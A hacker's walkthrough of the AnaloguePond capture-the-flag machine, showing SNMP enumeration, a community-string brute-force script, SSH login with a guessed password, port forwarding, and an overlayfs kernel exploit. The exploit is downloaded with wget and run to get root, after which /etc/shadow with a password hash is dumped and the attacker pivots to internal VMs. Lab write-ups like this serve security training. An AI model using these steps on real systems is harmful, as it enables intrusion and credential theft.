AnaloguePond CTF Walkthrough - DigiP

1. AnaloguePond CTF Walkthrough - DigiP
2.  
3. netdiscover
4. 192.168.1.249 08:00:27:c0:69:94 6 360 PCS Systemtechnik GmbH
5.  
6. nmap -sC -sV -T5 --open -v -p- --script vuln 192.168.1.249
7.  
8. Discovered open port 22/tcp on 192.168.1.249
9. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
10.  
11. #hosts file
12. 127.0.0.1 analoguepond
13.  
14.  
15. us -mU -Iv analoguepond:a -r 1000
16. UDP open domain[ 53] from 208.67.222.222 ttl 56
17. UDP open snmp[ 161] from 192.168.1.249 ttl 64
18.  
19.  
20. EXTRABACON
21.  
22. snmp-check -c public -v 2c 192.168.1.249
23.  
24. snmp-check v1.9 - SNMP enumerator
25. Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
26.  
27. [+] Try to connect to 192.168.1.249:161 using SNMPv2c and community 'public'
28.  
29. [*] System information:
30.  
31. Host IP address : 192.168.1.249
32. Hostname : analoguepond
33. Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
34. Contact : Eric Burdon <eric@example.com>
35. Location : There is a house in New Orleans they call it...
36. Uptime snmp : 00:47:17.27
37. Uptime system : 00:47:06.45
38. System date : 2017-4-26 02:05:41.0
39.  
40. [*] Network information:
41.  
42. Default TTL : noSuchObject
43. TCP segments received : noSuchObject
44. TCP segments sent : noSuchObject
45. TCP segments retrans : noSuchObject
46. Input datagrams : noSuchObject
47. Delivered datagrams : noSuchObject
48. Output datagrams : noSuchObject
49.  
50. [*] File system information:
51.  
52. Index : noSuchObject
53. Mount point : noSuchObject
54. Access : noSuchObject
55. Bootable : noSuchObject
56.  
57.  
58. onesixtyone 192.168.1.249
59. Scanning 1 hosts, 2 communities
60. 192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
61. 192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
62.  
63. Couldn't get onesixtyone to read multiple community strigns from file, so made my own little script.
64.  
65. #!/bin/bash
66. while read community
67. do
68. snmp-check -c $community -v 2c -w $1 #IP ex: 192.168.1.249
69. sleep 3
70. done < /mnt/HDD2/wordlists/communitystrings.txt
71.  
72. bash snmp-brute.sh 192.168.1.249
73. Only one found was public(but depends on your list and what is on the server)
74.  
75.  
76. snmpwalk -v 2c -c public 192.168.1.249
77. iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
78. iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
79. iso.3.6.1.2.1.1.3.0 = Timeticks: (622728) 1:43:47.28
80. iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
81. iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
82. iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
83. iso.3.6.1.2.1.1.7.0 = INTEGER: 72
84. iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
85. iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
86. iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
87. iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
88. iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
89. iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
90. iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
91. iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
92. iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
93. iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
94. iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
95. iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
96. iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
97. iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
98. iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
99. iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
100. iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
101. iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
102. iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
103. iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
104. iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
105. iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
106. iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
107. iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
108. iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
109. iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
110. iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
111. iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
112. iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
113. iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
114. iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
115. iso.3.6.1.2.1.25.1.1.0 = Timeticks: (623811) 1:43:58.11
116. iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 04 1A 03 02 16 00 2B 01 00
117. iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
118. iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
119. "
120. iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
121. iso.3.6.1.2.1.25.1.6.0 = Gauge32: 48
122. iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
123. iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
124.  
125. Location : There is a house in New Orleans they call it...
126. sshpass -f <(printf '%s\n' therisingsun) ssh eric@analoguepond
127.  
128. Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)
129.  
130. * Documentation: https://help.ubuntu.com/
131.  
132. System information as of Wed Apr 26 03:06:56 BST 2017
133.  
134. System load: 0.04 Processes: 81
135. Usage of /: 82.3% of 5.39GB Users logged in: 0
136. Memory usage: 35% IP address for eth0: 192.168.1.249
137. Swap usage: 0% IP address for virbr0: 192.168.122.1
138.  
139. Graph this data and manage this system at:
140. https://landscape.canonical.com/
141. New release '16.04.2 LTS' available.
142. Run 'do-release-upgrade' to upgrade to it.
143.  
144. eric@analoguepond:~$
145.  
146. eric@analoguepond:~$ cat /etc/*ele* /etc/issue;uname -a
147. DISTRIB_ID=Ubuntu
148. DISTRIB_RELEASE=14.04
149. DISTRIB_CODENAME=trusty
150. DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
151. NAME="Ubuntu"
152. VERSION="14.04.5 LTS, Trusty Tahr"
153. ID=ubuntu
154. ID_LIKE=debian
155. PRETTY_NAME="Ubuntu 14.04.5 LTS"
156. VERSION_ID="14.04"
157. HOME_URL="http://www.ubuntu.com/"
158. SUPPORT_URL="http://help.ubuntu.com/"
159. BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
160. Ubuntu 14.04.5 LTS
161.  
162. My IP: 192.168.1.249
163.  
164. Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
165. eric@analoguepond:~$
166. eric@analoguepond:~$ ls -lashR
167. .:
168. total 68K
169. 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 .
170. 4.0K drwxr-xr-x 3 root root 4.0K Dec 13 21:11 ..
171. 4.0K -rw------- 1 eric eric 47 Apr 26 03:07 .bash_history
172. 4.0K -rw-r--r-- 1 eric eric 220 Dec 13 21:11 .bash_logout
173. 4.0K -rw-r--r-- 1 eric eric 3.6K Dec 13 21:11 .bashrc
174. 4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .cache
175. 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .dbus
176. 4.0K -rw-r--r-- 1 eric eric 675 Dec 13 21:11 .profile
177. 32K -rw-rw-r-- 1 eric eric 29K Dec 18 15:44 reticulatingsplines.gif
178. 4.0K -rw------- 1 eric eric 711 Jan 7 18:32 .viminfo
179.  
180. ./.cache:
181. total 8.0K
182. 4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .
183. 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
184. 0 -rw-r--r-- 1 eric eric 0 Jan 7 18:32 motd.legal-displayed
185.  
186. ./.dbus:
187. total 12K
188. 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .
189. 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
190. 4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 session-bus
191.  
192. ./.dbus/session-bus:
193. total 16K
194. 4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 .
195. 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 ..
196. 4.0K -rw-rw-r-- 1 eric eric 476 Jan 7 16:44 1e9afac86f8648627311d32c585063c8-10
197. 4.0K -rw-rw-r-- 1 eric eric 476 Dec 22 20:40 1e9afac86f8648627311d32c585063c8-11
198. eric@analoguepond:~$
199.  
200. eric@analoguepond:~$ cat /etc/passwd
201. root:x:0:0:root:/root:/bin/bash
202. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
203. bin:x:2:2:bin:/bin:/usr/sbin/nologin
204. sys:x:3:3:sys:/dev:/usr/sbin/nologin
205. sync:x:4:65534:sync:/bin:/bin/sync
206. games:x:5:60:games:/usr/games:/usr/sbin/nologin
207. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
208. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
209. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
210. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
211. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
212. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
213. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
214. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
215. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
216. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
217. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
218. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
219. libuuid:x:100:101::/var/lib/libuuid:
220. syslog:x:101:104::/home/syslog:/bin/false
221. messagebus:x:102:107::/var/run/dbus:/bin/false
222. dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
223. landscape:x:104:110::/var/lib/landscape:/bin/false
224. sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
225. libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
226. libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
227. eric:x:1000:1000:Eric Burdon,,,:/home/eric:/bin/bash
228. colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
229. snmp:x:109:116::/var/lib/snmp:/bin/false
230. snmptt:x:110:117:SNMP Trap Translator,,,:/var/spool/snmptt:/bin/false
231.  
232. eric@analoguepond:~$ cat /etc/group
233. root:x:0:
234. daemon:x:1:
235. bin:x:2:
236. sys:x:3:
237. adm:x:4:syslog,eric
238. tty:x:5:
239. disk:x:6:
240. lp:x:7:
241. mail:x:8:
242. news:x:9:
243. uucp:x:10:
244. man:x:12:
245. proxy:x:13:
246. kmem:x:15:
247. dialout:x:20:
248. fax:x:21:
249. voice:x:22:
250. cdrom:x:24:eric
251. floppy:x:25:
252. tape:x:26:
253. sudo:x:27:
254. audio:x:29:
255. dip:x:30:eric
256. www-data:x:33:
257. backup:x:34:
258. operator:x:37:
259. list:x:38:
260. irc:x:39:
261. src:x:40:
262. gnats:x:41:
263. shadow:x:42:
264. utmp:x:43:
265. video:x:44:
266. sasl:x:45:
267. plugdev:x:46:eric
268. staff:x:50:
269. games:x:60:
270. users:x:100:
271. nogroup:x:65534:
272. libuuid:x:101:
273. netdev:x:102:
274. crontab:x:103:
275. syslog:x:104:
276. fuse:x:105:
277. kvm:x:106:
278. messagebus:x:107:
279. mlocate:x:108:
280. ssh:x:109:
281. landscape:x:110:
282. libvirtd:x:111:eric
283. eric:x:1000:
284. lpadmin:x:112:eric
285. sambashare:x:113:eric
286. scanner:x:114:
287. colord:x:115:
288. snmp:x:116:
289. snmptt:x:117:
290.  
291. ric@analoguepond:/var/log$ netstat -antplu
292. (No info could be read for "-p": geteuid()=1000 but you should be root.)
293. Active Internet connections (servers and established)
294. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
295. tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN -
296. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
297. tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN -
298. tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN -
299. tcp 0 36 192.168.1.249:22 192.168.1.66:52778 ESTABLISHED -
300. tcp6 0 0 :::22 :::* LISTEN -
301. udp 0 0 0.0.0.0:42984 0.0.0.0:* -
302. udp 0 0 192.168.122.1:53 0.0.0.0:* -
303. udp 0 0 0.0.0.0:67 0.0.0.0:* -
304. udp 0 0 0.0.0.0:68 0.0.0.0:* -
305. udp 6336 0 0.0.0.0:41040 0.0.0.0:* -
306. udp 0 0 0.0.0.0:161 0.0.0.0:* -
307. udp6 0 0 ::1:161 :::* -
308. udp6 0 0 :::39304 :::* -
309. eric@analoguepond:/var/log$
310.  
311. eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5901
312. Connection to 127.0.0.1 5901 port [tcp/*] succeeded!
313. RFB 003.008
314. ^C
315. eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5900
316. Connection to 127.0.0.1 5900 port [tcp/*] succeeded!
317. RFB 003.008
318.  
319. ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
320. ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249
321.  
322. We setup our forwarder to the remote system. We can now try vncviewer:
323. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
324. tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1405/ssh
325. tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1319/ssh LISTEN 1319/ssh
326.  
327. vncviewer 127.0.0.1:5901
328. Connected to RFB server, using protocol version 3.8
329. Performing standard VNC authentication
330. Password:
331. Authentication failed
332.  
333. However, we don't yet know the password.
334.  
335. hydra -L /mnt/HDD2/ctf/analouge-pond/risingsun.txt –t vnc 127.0.0.1:5901
336. wont connect... XD
337.  
338. ssh -f -N -D 7070 eric@192.168.1.249
339.  
340. proxychains nmap -sS -n -PN -p- 127.0.0.1
341. ProxyChains-3.1 (http://proxychains.sf.net)
342.  
343. Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:51 EDT
344. Nmap scan report for 127.0.0.1
345. Host is up (0.0000040s latency).
346. Not shown: 65531 closed ports
347. PORT STATE SERVICE
348. 111/tcp open rpcbind
349. 5900/tcp open vnc
350. 5901/tcp open vnc-1
351. 7070/tcp open realserver
352.  
353. Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds
354.  
355.  
356.  
357.  
358. nmap -sC -sV -T5 --open --script vuln -PN -p- 127.0.0.1
359.  
360. Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:58 EDT
361. Pre-scan script results:
362. | broadcast-avahi-dos:
363. | Discovered hosts:
364. | 224.0.0.251
365. | After NULL UDP avahi packet DoS (CVE-2011-1002).
366. |_ Hosts are all up (not vulnerable).
367. Nmap scan report for localhost (127.0.0.1)
368. Host is up (0.0000030s latency).
369. Not shown: 65531 closed ports
370. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
371. PORT STATE SERVICE VERSION
372. 111/tcp open rpcbind 2-4 (RPC #100000)
373. | rpcinfo:
374. | program version port/proto service
375. | 100000 2,3,4 111/tcp rpcbind
376. |_ 100000 2,3,4 111/udp rpcbind
377. 5900/tcp open vnc VNC (protocol 3.8)
378. |_sslv2-drown:
379. 5901/tcp open vnc VNC (protocol 3.8)
380. |_sslv2-drown:
381. 7070/tcp open realserver?
382.  
383. searchsploit Ubuntu 14.04
384. Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1) | linux/local/39166.c
385. We compile this locally, copy to /var/www/html and start apache2. On the victim machine, we wget the file, chmod +x, and then run it. We are now root!
386.  
387. root@analoguepond:~# id
388. uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)
389. root@analoguepond:~#
390.  
391. root@analoguepond:~# cat /etc/shadow
392. root:!:17148:0:99999:7:::
393. daemon:*:16652:0:99999:7:::
394. bin:*:16652:0:99999:7:::
395. sys:*:16652:0:99999:7:::
396. sync:*:16652:0:99999:7:::
397. games:*:16652:0:99999:7:::
398. man:*:16652:0:99999:7:::
399. lp:*:16652:0:99999:7:::
400. mail:*:16652:0:99999:7:::
401. news:*:16652:0:99999:7:::
402. uucp:*:16652:0:99999:7:::
403. proxy:*:16652:0:99999:7:::
404. www-data:*:16652:0:99999:7:::
405. backup:*:16652:0:99999:7:::
406. list:*:16652:0:99999:7:::
407. irc:*:16652:0:99999:7:::
408. gnats:*:16652:0:99999:7:::
409. nobody:*:16652:0:99999:7:::
410. libuuid:!:16652:0:99999:7:::
411. syslog:*:16652:0:99999:7:::
412. messagebus:*:17148:0:99999:7:::
413. dnsmasq:*:17148:0:99999:7:::
414. landscape:*:17148:0:99999:7:::
415. sshd:*:17148:0:99999:7:::
416. libvirt-qemu:!:17148:0:99999:7:::
417. libvirt-dnsmasq:!:17148:0:99999:7:::
418. eric:$6$7RkXSEhf$RhH8uZkqDOnejEuCmrCo0VBEdYKWP050O.ArVW4uGxmf0ovnNbLWqKWL5iB2yT0d0GoDvkb5chjQX79pa.tcy0:17148:0:99999:7:::
419. colord:*:17149:0:99999:7:::
420. snmp:*:17152:0:99999:7:::
421. snmptt:*:17152:0:99999:7:::
422. root@analoguepond:~#
423.  
424.  
425. root as of now, has no password, so ssh won't help us. We could set one, but doesn't seem like we're going to need to since the main task, is not to gain root, but complete a list of tasks the op has setup for us on the CTF.
426.  
427. The VNCservers must have passwords stored locally. Hopefully we can find and read them since we are now root, or, change them to complete our tasks.
428.  
429. root@analoguepond:~# cd /root
430. root@analoguepond:/root# ls -lashR
431. .:
432. total 20K
433. 4.0K drwx------ 2 root root 4.0K Jan 7 18:36 .
434. 4.0K drwxr-xr-x 22 root root 4.0K Jan 7 18:42 ..
435. 4.0K -rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
436. 4.0K -rw------- 1 root root 237 Dec 17 09:38 flag.txt
437. 4.0K -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
438. root@analoguepond:/root# cat flag.txt
439. C'Mon Man! Y'all didn't think this was the final flag so soon...?
440.  
441. Did the bright lights and big city knock you out...? If you pull
442. a stunt like this again, I'll send you back to Walker...
443.  
444. This is obviously troll flah #1 So keep going.
445. root@analoguepond:/root#
446.  
447.  
448.  
449.  
450.  
451. 2017-04-25 20:18:04.650+0000: starting up
452. LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name barringsbank -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 6cf27edd-7559-d6eb-1502-d3135c807785 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/barringsbank.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=c,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/barringsbank-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:6d:93:6a,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:0,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
453. char device redirected to /dev/pts/0 (label charserial0)
454. /var/log/libvirt/qemu/barringsbank.log (END)
455.  
456.  
457. 2017-04-25 20:18:05.470+0000: starting up
458. LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name puppet -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 3561f84c-71c3-f16f-4a7b-9097e7d2ac39 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/puppet.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=dc,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/puppet-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:5b:05:f7,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:1,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x4
459. char device redirected to /dev/pts/6 (label charserial0)
460.  
461. root@analoguepond:/var/run# ifconfig
462. eth0 Link encap:Ethernet HWaddr 08:00:27:c0:69:94
463. inet addr:192.168.1.249 Bcast:192.168.1.255 Mask:255.255.255.0
464. inet6 addr: fe80::a00:27ff:fec0:6994/64 Scope:Link
465. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
466. RX packets:604576 errors:0 dropped:0 overruns:0 frame:0
467. TX packets:436808 errors:0 dropped:0 overruns:0 carrier:0
468. collisions:0 txqueuelen:1000
469. RX bytes:45181046 (45.1 MB) TX bytes:34323377 (34.3 MB)
470.  
471. lo Link encap:Local Loopback
472. inet addr:127.0.0.1 Mask:255.0.0.0
473. inet6 addr: ::1/128 Scope:Host
474. UP LOOPBACK RUNNING MTU:65536 Metric:1
475. RX packets:7669 errors:0 dropped:0 overruns:0 frame:0
476. TX packets:7669 errors:0 dropped:0 overruns:0 carrier:0
477. collisions:0 txqueuelen:0
478. RX bytes:376210 (376.2 KB) TX bytes:376210 (376.2 KB)
479.  
480. virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
481. inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
482. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
483. RX packets:812 errors:0 dropped:0 overruns:0 frame:0
484. TX packets:796 errors:0 dropped:0 overruns:0 carrier:0
485. collisions:0 txqueuelen:0
486. RX bytes:47884 (47.8 KB) TX bytes:70860 (70.8 KB)
487.  
488. vnet0 Link encap:Ethernet HWaddr fe:54:00:6d:93:6a
489. inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
490. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
491. RX packets:2813 errors:0 dropped:0 overruns:0 frame:0
492. TX packets:9567 errors:0 dropped:0 overruns:0 carrier:0
493. collisions:0 txqueuelen:500
494. RX bytes:1376378 (1.3 MB) TX bytes:1621185 (1.6 MB)
495.  
496. vnet1 Link encap:Ethernet HWaddr fe:54:00:5b:05:f7
497. inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
498. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
499. RX packets:2845 errors:0 dropped:0 overruns:0 frame:0
500. TX packets:10528 errors:0 dropped:0 overruns:0 carrier:0
501. collisions:0 txqueuelen:500
502. RX bytes:1270004 (1.2 MB) TX bytes:1795087 (1.7 MB)
503.  
504. root@analoguepond:/var/run# ip link
505. 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
506. link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
507. 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
508. link/ether 08:00:27:c0:69:94 brd ff:ff:ff:ff:ff:ff
509. 3: virbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
510. link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
511. 4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN mode DEFAULT group default qlen 500
512. link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
513. 5: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
514. link/ether fe:54:00:6d:93:6a brd ff:ff:ff:ff:ff:ff
515. 6: vnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
516. link/ether fe:54:00:5b:05:f7 brd ff:ff:ff:ff:ff:ff
517.  
518.  
519. root@analoguepond:/var/run# iptables
520. iptables v1.4.21: no command specified
521. Try `iptables -h' or 'iptables --help' for more information.
522. root@analoguepond:/var/run# iptables --list
523. Chain INPUT (policy ACCEPT)
524. target prot opt source destination
525. ACCEPT udp -- anywhere anywhere udp dpt:domain
526. ACCEPT tcp -- anywhere anywhere tcp dpt:domain
527. ACCEPT udp -- anywhere anywhere udp dpt:bootps
528. ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
529.  
530. Chain FORWARD (policy ACCEPT)
531. target prot opt source destination
532. ACCEPT all -- anywhere 192.168.122.0/24 ctstate RELATED,ESTABLISHED
533. ACCEPT all -- 192.168.122.0/24 anywhere
534. ACCEPT all -- anywhere anywhere
535. REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
536. REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
537.  
538. Chain OUTPUT (policy ACCEPT)
539. target prot opt source destination
540. ACCEPT udp -- anywhere anywhere udp dpt:bootpc
541.  
542. so another subnet from 192.168.122.0/24
543. We check for nodes on the subnet.
544. root@analoguepond:/var/run# nmap -sN 192.168.122.0/24
545.  
546.  
547. Nmap scan report for puppet.example.com (192.168.122.2)
548. PORT STATE SERVICE
549. 22/tcp open|filtered ssh
550. MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC)
551.  
552. Nmap scan report for barringsbank.example.com (192.168.122.3)
553. PORT STATE SERVICE
554. 22/tcp open|filtered ssh
555. MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC)
556.  
557. ssh eric@192.168.122.2
558. The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
559. ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
560. Are you sure you want to continue connecting (yes/no)? yes
561. Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
562. +-----------------------------------------------------------------------------+
563. | Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
564. | most famous song |
565. +-----------------------------------------------------------------------------+
566. eric@192.168.122.2's password:
567. is user now "sandieshaw"?
568. We try : puppetonastring
569.  
570. ssh sandieshaw@192.168.122.2's password:
571.  
572. Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
573.  
574. * Documentation: https://help.ubuntu.com/
575.  
576. System information disabled due to load higher than 1.0
577.  
578.  
579. The programs included with the Ubuntu system are free software;
580. the exact distribution terms for each program are described in the
581. individual files in /usr/share/doc/*/copyright.
